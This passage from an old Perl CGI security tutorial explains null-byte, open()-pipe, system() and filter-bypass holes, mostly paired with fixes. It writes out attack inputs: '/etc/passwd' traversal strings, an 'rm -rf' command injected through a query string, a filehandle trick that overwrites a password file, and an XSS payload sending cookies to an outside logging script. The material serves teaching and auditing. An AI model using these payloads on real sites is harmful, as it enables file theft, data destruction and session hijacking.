Now what does this script do? It takes $file and puts /home/user/ infront of it and .txt at the end.  This is used to "make sure" the file opened is a.txt file.  But when you send something like script.cgi%00 to it then perl will send /home/user/script.cgi\0.txt to C which will see it as /home/user/script.cgi since it stops at the Null Byte.  So it will open /home/user/script.cgi instead of a .txt file.  This means you can do things like ../../../../etc/passwd\0.

Many scripts do not filter the NULL Byte and they depend on adding file extentions to stop you from reading any file on the system.  The fix is as simple as $file =~ s/\0//g; After you convert url encoding to ASCII, please notice this.  A few scripts I've seen filter null byte before they convert url encoding to ASCII.  This is pretty much pointless.

Another type of functions which are commonly vulnerable to this are when a script allows uploads and checks to make sure the uploaded file is a certain file extention.



Problems With open()
          If you didn't already know that open(touch file.txt|); will run the system command "touch file.txt" then now you do.  And this is a major problem in countless perl scripts.  Out of all these security flaws in perl code, this is the one I would like perl coders to focus on.  It is overlooked by many perl programmers and can easily be spotted and exploited by attackers.  I'd say it and reverse directory transversal are the most exploited perl coding there is for CGI.  Now lets get right to the examples shall we?
	use CGI;
$input=CGI->new();
$file = $input->param('file');
open(FILE, $file) or &diehtml("cannot open that file");

Besides reverse directory transversal you can now see how this lack of input filtering cause be deadly.  If you go to http://b0iler.eyeonsecurity.net/script.cgi?file=rm -rf ./| the current directory will be deleted! Not only is the pipe able to make open(FILE $file) execute commands but also open(FILE, "$file").  Of course open(FILE, '$file') will not work since single quotes do not interprete variables.  Also when you specify what method of I/O you are using when opening a file you cannot execute commands.  Examples of vulnerable calls:
	open(FILE, $file);                #$file = command|
open(FILE, "$file"); #$file = command|
open(FILE, "/home/user" . $file); #$file = /../../bin/command|
open(FILE, $file . ".txt"); #$file = |command\0 the null byte is needed to chop off that .txt
open(FILE, "$file.txt"); #$file = |command\0

The last two make use of the null byte.  Lets see another example of vulnerable code that uses the null byte.
	if(-e $file){
open(FILE, "$file");
}

now this gets tricky, the -e means exists, so the if is checking weather the file exists or not.  If it does exist it tries to open it.  but the file |command doesn't exist.  How about /bin/command? That exists, now to get perl to open() so that it will execute it instead of reading it.  One nice thing is that when perl checks if a file exists it calls on the operating system again, and since the operating system (*nix I hope) is coded in C the null byte works here.  Also when perl checks weather it should execute it or not it only checks the first character and the last character in the filename (open HANDLE FILENAME).  So we can set $file to something like /bin/command\0| and it will execute.  Perl will see the | at the end and execute the command, and the -e check will return true since C will check for /bin/command, stopping at the null byte.  But this is very limitting to the commands you are able to use since you cannot put any spaces or other characters in it.

I don't really see any serious problems with this, but to be safe just filter any dangerous meta characters and specify how you are opening files with < << > >>  The only problem I see is a DoS - using up tons of resources by running a lot of programs.  There might be a program which could cause security concerns that doesn't require any arguments..  but I am unaware of any installed by default.

The safest way to open a file for reading would be to use sysopen or the 3 argument version of open.  These force you to specify what kind of mode these files are being opened in.  Here is an example of sysopen:
	require Fcntl;          #needed for the MODE parameter - in this case O_RDONLY
sysopen(FILE, '/home/user/file', O_RDONLY);

sysopen is a more low level version of open, which doesn't have any fancy features such as '-' for STDIN/STDOUT, newline tricks, pipes to execute commands, or anything else..  it's just plain old open to read or write.  An example of open with 3 arguments.  As mentioned before when you use < << > >> no commands can be executed by using pipes.
	open(FILE, "<", '/home/user/file');

The last open() problem I will go over is one I have only seen once, but I am sure exists in a few other scripts out there.  This is the use of >& as the mode will make the input/output the same as a previous filehandle.  This is a pretty limitted attack, but sometimes can be useful if the script filters for any other reverse directory transversal methods.  Take this example:
	#pretend there is good filtering for $FORM{'user'}
#stopping any reverse directory transversal or command execution.
#the database is built like:
#user1:password
#user2:password
#user3:password

open(PWDFILE, '/home/user/not_www_readable/passwd');

#put lines into #value, and go through each line.
while(chomp($value = )){
#split the line up into username and password variables
($username,$password) = split(/:/, $value);

#check if the username and password match.
if($FORM{'user'} eq $username && $FORM{'password'} eq $password){
$access = 1;
allowaccess();
}
}
#if the user failed to login then $access would not be set
if(!$access){
#append to the userfile.. if the userfile does not exist then create it.
open(USERLOG, ">>$FORM{'user'}") or open(USERLOG, ">$FORM{'user'}");
print "$FORM{'user'} had an invalid login attempt\n";
close(USERLOG);
}
close(PWDFILE);

This is kind of a poor example, since the close(PWDFILE); should be before the if(!$access) in a "proper" script, but many times open is called multiple times while another filehandler is still open from a previous one.  This is what I was trying to emulate as it was simular to the script which I found this vuln in.

The problem here is if someone logs in with the username of '&PWDFILE' they will fail logging in and the script will attempt to log their failure by opening a logfile for that username.  The file &PWDFILE does not exist so it cannot append to it with:
	open(USERLOG, ">>$FORM{'user'}")

but the following is valid
	open(USERLOG, ">&PWDFILE");

Which will cause the script to overwrite /home/user/not_www_readable/passwd with "&PWDFILE had an invalid login attempt\n".  Now the attacker just logs in with: username = '&PWDFILE' and password = '' and they get access.  The person who coded this script thought they stopped all reverse directory transversal attacks, but since they did not know all of perl's features for open they left a door open for attackers.  There is another spechial convenient feature, which is &=.  It makes that filehandle an alias for another one, this would allow reading files, while >& allows writing.  Keep your eye open for these sorts of vulns, if anyone finds another one I'd love to hear about it.  Note, the same applies for '>file' when you use a bare open(FILE, "$file").  The default mode is read-only, but if $file is '>file' then it will create/overwrite 'files'.  So now we know that open()'s without a mode for i/o are vuln, and open()'s even with a file i/o can be vuln...  only in perl folks.

Bad open() calls are probably the easiest to find for auditors, and easiest to make for programmers.  Try to make it a habit of using secure open() calls even when the file isn't based on user input.  There are a few other problems involving open I'll get to later in the paper.



Perl Length Limits
          I might aswell mention this here just because I haven't seen it in any other papers.  I have only seen this problem only a few times but things like this do exist and 99% of the perl coders out there never even think about it.  This is when perl limits filename sizes, variable sizes, and limits other such things which can effect how things in a script work.  With this example you can effect things such as -e check, open, unlink, and other file handling functions operate.

The problem is simple, take this code as an example, although long should be simple enough for newbies to understand:
	#check for bad characters
if($FORM{'path'} =~ m/\0|\r|\n/ig){ die "illegal characters"; }

#check for .htaccess file in /home/user/accounts/$FORM{path}
$htaccess = "/home/user/accounts/$FORM{user}/.htaccess";

if(-e $htaccess){
#read .htaccess
open(HTACCESS, "<", $htaccess) or die "could not open .htaccess file";
@lines = <HTACCESS>;
close(HTACCESS);

#get username and password
($correctuser,$correctpassword) = split(/:/,$lines[0]);

#check if they are right, give access
if($FORM{'user'} eq $correctuser && $FORM{'pass'} eq $correctpassword){
print "access granted";
access();
}
else{ print "access denied"; }
}
#if the .htaccess does not exist then create a new account.
else{
#makes the directory
#error unless the directory already exists
#if it exists than the script thinks it is just missing a .htaccess
mkdir($FORM{'user'},0755) or die "error accessing user directory" unless (-d $FORM{user});

#create .htaccess file and print username:password
#this should be encrypted but it is just an example.
$accessfile = $FORM{'user'} . "/.htaccess";
open(USERACCESS, ">", $useraccess) or die "could not create user file";
print USERACCESS "$username:$password";
close(USERACCESS);
}

So what does this code do? It will check if /home/user/accounts$FORM{'path'}/.htaccess exists, if it does it will check the submitted username and password against the real one.  If it doesn't exist then it will create a new user directory and a .htaccess in it with the submitted username and password.  This looks secure from all the previous types of attacks, but because perl limits filename sizes to around 2050 bytes (atleast that is what it is on my box) it can be exploited.

So lets say someone has the account with the username of admin.  Their home directory would be /home/user/accounts/admin/ and their username:password would be in /home/user/accounts/admin/.htaccess usually this would protect people from accessing this directory.  But if an attacker submits ././././././././././././[another 2000 bytes of this]./././admin as $FORM{'user'} there is trouble.  The attacker will need to make ././././[etc]./././admin/.htaccess a valid length so that the .htaccess file is created when the script does open(USERACCESS, ">" $useraccess) but will fail the if(-e $htaccess) when another 20 bytes are added from the '/home/user/accounts/'.

There are other possible ways to exploit scripts based on how perl sets size limits, this is a very tricky thing to find and even harder to remind yourself of these limits while coding.  Best stratigy is to limit sizes of all input to a reasonable length (few hundred characters) and be very aggressive when checking if files/values exist.  I would also suggest using sysopen instead of open, take this for example:
	sysopen(FILE, $file, O_WRONLY | O_CREAT);

No need to worry about perl's length restrictions as sysopen will not overwrite a file.  Also helps those silly race conditions that old perl versions have..  not really a CGI problem though.  You can easily check what your perl limits filenames to by doing something like this:
	linux:~ # perl -e 'while(1){$n++;unless(-e "./" x $n){ die "perl sets limit at " . (--$n);}}'

This will tell you the limit on the number of characters perl allows before it cannot open, unlink, check for existance, or any other simular file handling functions.  I'd be interested in hearing if anyones is way off from 2050 (b0iler@hotmail.com) or if this is a constant value.  Also if anyone else can think of a way to abuse other perl limits, I have found a few..  but they seem too high to exploit or there is no situation where they would cause a problem.



System Commands
          These are a big time threat if not filtered correctly and they take in arguments which are based on user input.  Perl is used by many as a way of calling apon different programs and then tieing the output together.  This can be very dangerous if the same idea is used when coding CGI scripts.  The security problem here is that you could be giving the attacker a clear shot at executing commands.  The two basic functions for executing system commands in perl are exec() and system().  They both work just like as if you were at the command prompt.  You first type the program to run, followed by the arguments to this command.  You can also use pipes and redirect i/o with both of these.  So lets say you have this in a script:
	system('cat file.txt');

That is fine.  No real security risk there.  But if you call system() with a arugment inputted from a user.
	system("cat $ENV{'QUERY_STRING'}");

Then the user can define any file the script has permission to read.  Might not be a big deal, just filter reverse directory transversal and add a ./ infront of $ENV{'QUERY_STRING'} right? no.  Something like this is still extremely vulnerable:
	$input = $ENV{'QUERY_STRING'};
$input = s/\\//;
$input = s/..//;
system("cat ./$file");

It may stop reverse directory transversal, but we forgot that the cat command can take multiple arguments.  Something like cat file.txt /etc/passwd would still work and get past our reverse directory transversal filters.  We need really strict filters in place so that the script can only read files from the current directory.  Which of course includes this script's source, remember to filter this aswell.  You can use $0 to get the name of the current script.  After you have completely stopped reverse directory transversal it does not stop the attacker from piping multiple commands through this system() call.  Many scripts will filter the character ";" and think their system calls are safe.  There is also the "|" character to be worried about.  So if you see this filter you know you can evade it with the |.
	$input = $ENV{'QUERY_STRING'};
$input = s/\\//;
$input = s/..//;
$input = s/;//;
system("cat ./$file");

script.cgi?file.txt|cat /etc/passwd would work against the above.  So this would be safe right?
	$input = $ENV{'QUERY_STRING'};
$input =~ s/\\//;
$input =~ s/..//; #this is a poor filtering, read next section to see why
$input =~ s/;//;
$input =~ s/\|//;
$input =~ s/^\///; #stops /full/path/attacks
system("cat $file");

It filters reverse directory transversal and the two pipes we talked about.  So attackers cannot do any of the following
	script.cgi?/etc/passwd 
script.cgi?../../../../etc/passwd
script.cgi?file.txt;cat /etc/passwd
script.cgi?file.txt|cat /etc/passwd

But still it is not safe.  There are the i/o redirecting characters > >> and < << which need to be filtered or things like this can be done: script.cgi?</etc/passwd Again bypassing our reverse directory transversal filters and getting the file they want.  You need to be extremely carefull when dealing with files and letting users specify the directory or filename to files can be very dangerous.  Make sure you filter extremely well, or only allow the good characters.

Now I said system() and exec() work just like a shell, they don't really work exactly like them.  Only if there is a shell metacharacter in the call does system() send it to the shell.  Otherwise perl can parse this itself and call execvp() instead.  If perl sees a shell meta character in the data passed to system() then it must execute this through the shell so it can handle what to do with the meta characters.  Just like the open() function perl allows for a more safe way to make this call with multiple arguments.  Take this for example:
	system("cat", "/home/user/$ENV{'QUERY_STRING'}");

Normally with system("cat /home/user/$ENV{'QUERY_STRING'}") the QUERY_STRING could contain a metacharacter and would get sent to the shell for processing.  but with the example above perl sends cat as the command and /home/user/$ENV{'QUERY_STRING'} as the argument.  This stops from attacks like: file;rm -rf /home/user/ where a meta character is used to issue multiple commands or do something the script is not meant to do.  Now that we got reverse directory transversal and metacharacters taken care of system() calls are safe, right?  Not quite.  Anything you do in perl you must completely understand, like how the open() can make filehandles aliases for others with &=, most people do not know this and therefore they do not prevent against this being exploited.  Same applies for calling programs from within your scripts, if you don't know a feature of it..  you cannot filter against it being exploited.  One such feature is found in the unix mail program, this feature allows users to execute commands via the shell with ~!.  So filtering this is very important, but if you blindly call upon the shell to execute programs then the programs features may be exploited.  Make sure to research any programs you are calling and know all of it's features before sending user input to it.

The use of open(HANDLE, "command|"); as stated before can also be used to issue commands.  There is a bad side to using this method as the commands get sent to the shell.  So to avoid this we make open() not call the shell with '-|' and '|-'.  The first one, -|, is for reading the output of the command, and the second one, |-, is used to send data to a command.  The - means STDIN or STDOUT, with the | it executes a command.  Here is an example:
	open(READ, "-|", "cat", "/home/user/$FORM{'file'}");
@lines = ;

This would execute the cat command with the argument of /home/user/$FORM{'file'}.  Maybe I should also tell you that you cannot both read and write to a command, so things like |command| are illegal.  This is the method I prefer for opening a shell for writing/reading:
	open(WRITE, "|-") || exec("/bin/command", "$FORM{'file'}");
print WRITE 'this is piped to /bin/command, which handles the data.';

This will allow you to print to the program without having to open a shell.

Another common way to execute commands in perl is the use of backticks: `command` just like in the shell the backticks means to execute this command and return the results.  This may look like a single quote, but it isn't.  The backtick is located to the left of the 1 key on every keyboard I've seen.  This will execute the command and return the output to be put in a variable (or anything else you want to do with it).  There is also the qx// which works the same as the backticks.  Here is an example:
	$file = `cat /home/user/$FORM{'file'}`;
print "the contents of $FORM{'file'} is:\n\n $file";

the qx// would be $file = qx(cat /home/user/$FORM{'input'}); #using () just so I don't have to escape the /'s.  Not much to say about the backticks besides that they do not return any errors, just whatever the program prints to STDOUT.  If what the program prints is an error, then this will get returned.



Evaluating User Input
          I am very sorry, but I will not be covering how to handle insecure perl from user input.  This topic is pretty lenghy and does not apply to many people, so if you would like to learn about that try the security section of "Programming Perl".  Sorry if this section is short, I just kind of threw it on at the end.

eval() is a function which will interpret anything passed to it as perl.  This can be very dangerous since perl can give attackers so much power over a machine.  If an eval took pure user input and sent it to eval() the attacker could easily exploit it.  Here is an example of how eval() works:
	$code = 'print "hello world\n";';
eval($code);

This would make the string 'print "hello world\n";' get parsed by perl, printting "hello world\n".  Since anything can be sent to eval() things like system(), exec() and other system command functions can be used to make a poor eval() call into a virtual shell for the attackers.  When handling code that must be eval()'d you need to be extra sensitive for possible security problems.  Treat it as dangerous as a system() call, maybe even more dangerous.  The /e is a regex modifier which is used to evaluate a regular expression before running it.  eval() isn't the most commonly used function in CGI, but I've seen it abused many times.  Even with good input filtering it is hard to stop all the possible dangers in perl.  I would suggest using eval() as little as possible, espechialy with user input.

Lesser used functions which need to be carefull to not accept user input are require and do.  I cannot think of any others which you need to be careful with, I know more exist, email me if you know of some.



Poor Input Filtering
          This section might seem a bit repetitive since I have been going over problems in filtering and what to filter all along, but filtering user input is such an important part in securing your CGI scripts I need to cover it more indepth.  You must be completely aware of every possible combination of characters that can be inputted and how they will effect the program.  Many people scripting these CGIs have no clue that .\./ is the same as ../ and that it will eluid their filtering.  They figure they are stopping all reverse directory transversal by s/.\.\///g; This is one of the main problems in CGI scripts, lack of proper filtering.  Some scripts don't filter at all..  they are quickly exploited.  Others filter most of the possible damaging input, but allow one or two key combinations to pass through and exploit the script.  Lets go over good and bad filtering techniques.

The first and most effective way is to deny anything and allow only what is clean.  for example if you want to open a file:
	if($filename !~ m/^[\w\-\.]*$/){ die "bad characters in filename\n"; }

This will check if the filename only contains 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-.' and none others.  Since these are all ok characters for a filename and represent no security concerns for us we will let them pass.  Anything that is not [a-zA-Z_0-9\-\.] will cause the script to die.  If you were to filter for just characters which might be used to exploit the script then you are running the risk of forgetting a character or allowing attackers to bypass the filters or use the filters to construct a string which will exploit the script.  Lets take an example with multiple filters trying to get rid of all reverse directory transveral and command execution vulns.  This problem depends on the order of your filters.  Where one filter will match and then make the string into something that should have been filtered by a previous filter (or by that one).  Here is an example of an attempt at good filtering:
	
$filename = '/home/user/' . $ENV{'QUERY_STRING'};

$filename =~ s/\\\///g; #filters \/
$filename =~ s/\\\.//g; #filters \.
$filename =~ s/\.\.\///g; #filters ../
$filename =~ s/\|//g; #filters |

now this will make '../../etc/passwd' into filename.  will get rid of all \/ and \. tricks if you were to try something like .\./.\./etc/passwd or ..\/..\/etc/passwd.  Also will filter out the null byte if you tried filename.cgi\0.  But do you see the problem with how the filters themselves could be used to construct an exploit?  Here's how.
	$ENV{'QUERY_STRING'} = .|./.|./etc/passwd

which will not get filtered by the first three lines since no where contains \. \/ or ../, but the last one will effect it because it has |'s in it.  So it starts as .|./.|./etc/passwd, passes the first three filters without changing it and gets turned into ../../etc/passwd by the last filter.

Here is an even more common problem with that filtering technique.  This one does even need that last s/\|//g; to work as it relies on the s/\.\.\///g; to produce the ../'s.
	$filename = '/home/user/' . $ENV{'QUERY_STRING'};
$filename =~ s/\///g; #filters \/
$filename =~ s/\\\.//g; #filters \.
$filename =~ s/\.\.\///g; #filters ../

This one is alittle more tricky for people to catch, most perl coders wouldn't think twice about s/\.\.\///g getting rid of all ../s in a variable.  But this will exploit the filter making the string dangerous.
	$ENV{'QUERY_STRING'} = .../...//.../...//etc/passwd

This will pass the first two filters again.  It will be effected by the last one, which will turn it into ../../etc/passwd.  Exactly what the attacker wanted it to be.  This one is also very common and even many security aware perl programmers make input filtering mistakes.  I've seen multiple suggested fixes for scripts posted to bugtraq which are still vuln because they contain poor filtering.

This type of filtering problem where the filters help create the dangerous string is often used for ../ and XSS attack.  But can be exploited for just about anything.  Always make sure your filters aren't turning the string into anything dangerous.

Another common mistake in filtering is forgetting that multiple matches can be found within one variable.  Let me show you an example from a fix to a message board script which was supposed to stop javascript in the <img> tag.  The board converts [img] into <img>
	if ($message =~ /\[img\]http:\/\/.*\[\/img\]/) {
$message =~ s~\[img\]\n?javascript\:(.+?)\n?\[/img\]~\[ img\]javascript\:$1\[/img \]~isg;
if($message =~ m~\[img\]\n?(.+?)\n?\[/img\]~gi && $1 !~ m~javascript\:~gi) {
$message =~ s~\[img\]\n?(.+?)\n?\[/img\]~<img src="$1">~isg;
}
}
else{
die "img tag's src needs to start with http://";
}

First off, this is vuln to html encoding where javas&67;pt gets past the filters for 'javascript' and will still get interpreted by the browser as javascript.  Most javascript filters do not stop this, and almost all can be evaded for XSS.  But there is another problem with the design of this filter.  As I mentioned before in the section about the SSI filtering problem perl does "backticks" once it finds the first part of a match.  So in this case $message =~ s~\[img\]\n?javascript\:(.+?)\n?\[/img\]~\[ img\]javascript\:$1\[/img \]~isg; would find the first [img] then jump to the end of the line and look for the first [/img].  This script will put anything found after [img]javascript: back into $message.  This anything could be another [img]javascript string which would be turned into html.  Take this example:
	#line breaks added so lower resolutions don't have to scroll sideways
#sorry 800x600 and lower, you still get it.
$message = "[img]http://a[/img][img]javascript:[img]javascript:
document.write('<img src=http://b0iler.eyeonsecurity.net/log.cgi?cookie='+escape(document.cookie)+'>');
var nothing='[/img]';[/img]";

[then the filters]

This would find the first match of [img]javascript, and then the last match.  Instead of trying to explain exactly what is happening try running this script:
	#!/usr/bin/perl
$message = "[img]http://a[/img][img]javascript:[img]javascript:
document.write('<img src=http://b0iler.eyeonsecurity.net/log.cgi?cookie='+escape(document.cookie)+'>');
var nothing='[/img]';[/img]";

print "0: $message\n\n";
if ($message =~ /\[img\]http:\/\/.*\[\/img\]/) {
print "1: $message\n\n";
$message =~ s~\[img\]\n?javascript\:(.+?)\n?\[/img\]~\[ img\]javascript\:$1\[/img \]~isg;
print "2: $message\n\n";
if($message =~ m~\[img\]\n?(.+?)\n?\[/img\]~gi && $1 !~ m~javascript\:~gi) {
$message =~ s~\[img\]\n?(.+?)\n?\[/img\]~<img src="$1">~isg;
print "3: $1\n\n";
}
}
print "5: $message\n\n";
exit;

As you can see 3 is the one which is totally unfiltered for javascript and has it's [img] converted to <img>.  This filtering problem is not as widespread as the "filters effecting filters" one, but I've seen it a half dozen times.  The key to security is imaging all the possible ways an attacker can do things, and then think if they will threaten security at all.  Since it is hard to be certain there is no possible ways there are many security holes in well tested scripts who's author had security in mind when coding.  Another good rule of thumb is to deny anything that could be dangerous, do not try to correct it.  If this script would have just done something like:  if($message =~ /javascript/){ die "no javascript allowed"; }  then it would have prevented this problem.

The only other thing I really look for in the filtering of input is weather the programmer forgot to filter a metacharacter.  This is usually \ or | which get left out.  the \ can cause problems because it can be used to escape the '\' when a filter just escapes other metacharacters.  The | can be used to both exploit a poorly called open() or as a pipe in a shell command.  Many programmers will filter $command = s/;//g; but will forget the |, &, &&, and file input and output operators: >> > and < <<.

Final problem I will go over in filtering problems is just simply forgetting things.  Sometimes a programmer will filter bad strings in input variables, but they forget to check uppercase aswell as lowercase.  for instance, I've seen things like this a few times:
	if($FORM{'file'} =~ /\.cgi$/){
&errorhtml('you submitted an invalid file type');
}

This might look good at first glance, and the programmer might never think twice about it.  But sending script.CGI will allow you to specify CGI files.  Although this tutorial is more based towards *nix systems, this problem is more so for windows.  This is because windows filenames are case insensitive.  So script.CGI is the same as script.cgi.  On *nix these are two different files.

Other things include the forgotten meta characters, like the forgotten '\' in the regex I mentioned in the Reverse Directory Transversal section.  Or forget that script.cgi\0 will open the script.cgi file. 



Examples Of Vulnerable Scripts


          This section of the tutorial is majorly lacking, this is mostly due to my focus on the rest of the tutorial.  Also the fact that it is just plain more fun to talk about all the holes I found rather than going through even more code and writing my own.  perlaudit.pl isn't much of a script as of yet since it has failed to grab my interest and I lost many of the common CGI exploit project scripts I coded.  I might update this section with more info if I complete these tasks..  or I might just remove it and move on to something more entertaining.



Common CGI Exploit Project
          I proposed this idea to a few newbies on security on IRC one day and they seemed to want it done really badly.  The idea was to make perl scripts which they can exploit to both see how CGI exploits work and learn alittle about them.  So after alittle work I have set up a few examples of how to exploit perl scripts.  They are just interactive examples used to teach people about the most common holes in scripts on webpages.  I made them so that they require very little knowledge to do, almost everyone should beable to exploit them.  You can find the scripts online on my site at http://b0iler.eyeonsecurity.net in the tutorials section under the "Common CGI Exploit Project" link.  I would suggest knowing alittle bit of perl or php before trying these..  although you still can do them without any, and you might learn a bit from them.  Don't worry about damaging my site, the scripts aren't really exploitable.  I made them so that they check for a possible exploit, if you get it then it will display information just like you really did exploit it, but in reality you didn't.  Also the source code to the vulnerable version of the scripts is avalible on the site.  I hope to add more and more examples over time, but I am lazy so don't count on it.  I hope you have some fun learning about exploitting =)

I also coded up a small perl script to help find possible vulns in CGI vulns.  It will check every perl file in a directory for commonly exploitable function calls and then will ask if you want to see where the variables that influence that function came from.  Then it asks if you want to see all filters put on this variable.  The script is very beta and only will help find the most easy to spot vulnerabilities.  It will not automate the proccess completely, you must still know what to look for inorder to find vulns with it.  It just speeds up the process.  Kinda sorts out things to make the process go faster.  You can get this script when it's finished at http://b0iler.eyeonsecurity.net in the tutorials section right under the link to this tutorial.  It will be called perlaudit.pl.  Also there will be a zip/tarball of all the scripts so you can download them and test on your local server.



Real Life Examples
          Ok, so far everything has been made up senerios.  In RFP's paper he went through some real world examples of what he was talking about.  I found this helpful and it really brought home the points he was trying to make.  So I will do the same and show you a few scripts that I found with vulnerabilities I have talked about.  I am sorry, but for now this section does not exist, this is because I haven't had time to find scripts with good examples of the problems I talked about.  Maybe I'll go through bugtraq one week and dig up some good ones to talk about.  Until then just reread the paper to better understand something =)



Perlaudit.pl
          This is a short script which I wrote one day, although in it's current state won't do much more than egrep "open|system|\`|exec|eval".  I would like to call on others to help me improve this script to help find common vulnerabilites in perl scripts.  It is basicly a egrep with some helpful options like: to see where variables are defined (helps to see if they are by user input or hard coded) and to see if you can evade the filters on these variables, like the kind discribed thoughout this paper.

You can get perlaudit at my website: http://b0iler.eyeonsecurity.net in the tutorials section there will be a link to it right under the link to this tutorial.  I'd like to hear some comments on this script and hopefully ideas on how to improve it, since at it's current state it isn't very useful at all.  If you have the time and skill feel free to add your own functions that help find or improve how to script works.  If this script gets advanced it could easily find almost every common vulnerability and check if it is exploitable with GET, POST, or COOKIE (and some ENV) variables.  It would be very helpful to people searching for vulnerabilities and for programmers who don't know a great deal on security.

I'd also like to hear about any other perl auditting code out there.  If there is already a great script to do this I will try it out and report on it.  My email address is at the end of this paper, but for lazy people it's b0iler@hotmail.com.  I would really love to hear from a few people on this, especially anyone with some real coding skills who wants to help.

as of 5-1-02 perl audit is not even close to being released.

Conclusion


          My purpose in writing this paper was to help friends out with finding security flaws in CGI scripts.  But as side goals I wantted to introduce a few new techniques I've found to the world of exploiting CGIs and create an easy to understand, yet detailed paper on all the common problems.  It seemed like the net was missing this.  I hope someone learned something new, or understands something better now, if so my purpose was fulfilled.

          Perl was not designed with the net in mind.  It does have a few security benifits over shell scripts and other basic languages, but for the most part it is up to the author of the script to know what is dangerous and how to handle it.  Perl provides almost unlimitted amount of power, one mistake and you are letting anyone execute commands on your system..  anonymously.  Now that you know the basics of how attackers abuse CGIs you can help secure your own or others.  I would recommend reading a bit more about perl/web security if you are serious about this, I just covered the basics lightly.  There is plenty of indepth documentation about perl on the net, but it also takes some experience through trial and error to fully become comfortable coding CGIs with perl.

I was orignally planning on making this paper alot longer, including both how to exploit vulnerabilities and how to prevent them from happening.  After I wrote a few paragraphs about securing your perl scripts a friends said it was boring and suggested just pointing the readers to a few good sources on perl security.  It seems to me like that's a good idea.  I'll just use a few quotes from the camel to tempt you into reading about perl security.  The basics begin at Taint mode, and it doesn't get much more complicated than that.  Even though you use perl's built in saftey that doesn't mean you are secure, one bad attempt at filtering user input to make it safe can lead to a major vulnerability, take some larry's advice and only allow what is safe, deny the rest.

          "Programs that can be run remotely and anonymously by anyone on the Net are executing in the most hostile of environments.  You should not be afraid to say "No!" occasionally."

Now to scare you all into actually learning about taint mode here's some more insight from Mr Wall himself.

          "On the more security-conscious sites, running all CGI scripts under the -T flag isn't just a good idea: it's the law."

There, my job is done.  If you need to contact me try emailing me at b0iler@hotmail.com or on irc at a ton of different channels.  EFnet (#vuln), undernet, dalnet, etc..  as b0ils, b0iler, b0iled, or b0ilmatic.  If all else fails try the message boards at blacksun.box.sk



FAQ

1  Question:  "I don't know perl and your tutorial is too hard to understand, can you write a section on perl?"

     Answer:  No, there are already tons of great perl tutorials, and it would take me a year to write a tutorial on perl.  This tutorial is ment for people who already know perl and wish to learn about more advanced ways of finding/preventing vulneribilities in CGIs.

2  Question:  "How Do I $something ?"

     Answer:  Read the tutorial


3  Question:  "What if I didn't understand $something ?"

     Answer:  If you don't understand a part of this tutorial go learn more perl/unix =)


4  Question:  "I know perl, but I still didn't understand $something ?"

     Answer:  Try rereading the paper, if that still doesn't work check out other papers on perl security and do a little testing yourself. a little


5  Question:  "What's the best way to find holes in scripts?"

     Answer:  by looking at the code, thinking laterally, and setting up a test server to try things on"


6  Question:  "Is there any secret to finding holes in scripts?"

     Answer:  egrep "open|system|exec|\`|eval|unlink" *.cgi or use my perl-audit.pl script.


7  Question:  "If it is so easy to exploit CGI scripts why doesn't everyone do it?"

     Answer:  Many people do exploit them..  but some people find it extremely boring and time consuming to go through all that code.  A lot of exploits go unreported and are kept underground or are fixed in newer versions of the script.


8  Question:  "Haven't most of the vulnerabilities in CGI scripts been exploited already?"

     Answer:  Even though Perl has been around since 1986 and CGI scripts have been used on the net for along time.  There are still new scripts being coded everyday and of course there are older scripts which have vulnerabilities in them that haven't been exploited yet.


9  Question:  "Why learn how to exploit perl when PHP is getting so popular?"

     Answer:  By learning how to exploit perl CGI scripts you will be able to learn how to exploit HP in no time :) And there isn't nearly as much documentation on common vulnerabilities in PHP scripts as there is for Perl.  There are some well known hot spots that provide possible exploitation..  I will cover these in another tutorial.  Shouldn't be too long after this one that I release one on PHP security.


10 Question:  "What can I do if I don't have the source to a script?"

      Answer:  try making educated guesses as to what could make the script vulnerable.  You can also try to find an exploit in another script (or that script) which will allow you to view files sources.


11 Question:  "Is exploitting CGI hard?"

      Answer:  yes and no.  Finding an exploit in 1000 scripts is easy, just look for bad open and system calls.  But design flaws can take a lot longer and can require hours of testing.  You need to understand what the script is doing to find design flaws, this takes a lot of concentration and perl knowledge.


12 Question:  "I heard "homemade" CGI scripts are more vulnerable to being hacked than distributed"

      Answer:  Many people claim this, but I find it false.  The basis of this argument is that distributed scripts are made by "professionals", which may be true..  but most still have very little knowledge in perl security (even a lot of "security experts" program vulnerable scripts).  The other claim is that full discloser helps to find all the holes and patch them quickly.  This is true, but it hard to stay ahead of the attackers when an exploit is published.

I find many holes in publicly distributed scripts, I also find plenty of holes in homemade scripts, but when a attacker is going to exploit a script it helps a lot to have the source.  Most "hackers" don't have the knowledge of all the possible things to try to exploit scripts, infact most just wait for exploits to be handed to them on bugtraq.  Security through obscurity may not be great, but in a world of script kiddies it can be a good thing.  Try not to let anyone know what scripts you are running by renaming them and their directories.  But still keep on top of the latest security news and audit your scripts by hand.  Bottom line, both homemade and publicly avaliable scripts contain holes.  I wouldn't say either is more secure.


13 Question:  "I read that perl has race conditions, why didn't you mention this?"

      Answer:  As far as I know, Perl has fixed all the race conditions in the latest releases.


14  Question:  "Is reading files really that important a security concern?"

      Answer:  yes, on many systems there is some kind of further access which can be gained once file reading is avaliable to the attacker.  Files such as .htaccess, .htpasswd, and other configuration/password files can provide access to parts of the site which should be offlimit.  Reading scripts source can also allow the attacker to find further vulnerabilities which could allow things like writing to files or command execution.


15 Question:  "Is writing to files really that important a security concern?"

      Answer:  Writing to .htaccess files or other configuration files and scripts can allow an attacker more access and privileges than they were meant to have.  Many options are avaliable to attackers to turn their file writing privilege into further access such as command execution.  This is mostly done by writing scripts which will issue commands for them.


16 Question:  "Is CGI security really that big a deal?"

      Answer:  There are many situations when everything on the system is secure from remote access, but a CGI script allows attackers to issue commands.  This can be used to gain further access by exploiting a local problem in the system.  According to the sans's top 10 list of "The Ten Most Critical Internet Security Threats" CGI vulnerabilities are the number 2 biggest problems in internet security.  Then in the top 20 list released 10 months later CGI security was still rated among the top security concerns on the net.  While most of the old problems were solved and disappeared from the list CGI problems still remained strong.  This is not just a problem we will see for the next few months, CGI security is a major issue for the net.


17 Question:  "Is taint mode that important?"

      Answer:  Yes, it is manditory to learn about if you are going to code CGI.


18 Question:  "If I know a new/different technique to exploit/find vulns in perl scripts what should I do?"

      Answer:  I'd be glad to hear about any different ways, if it is incredibly new then maybe post to bugtraq or write a paper about it.


19 Question:  "Why did you write this?"

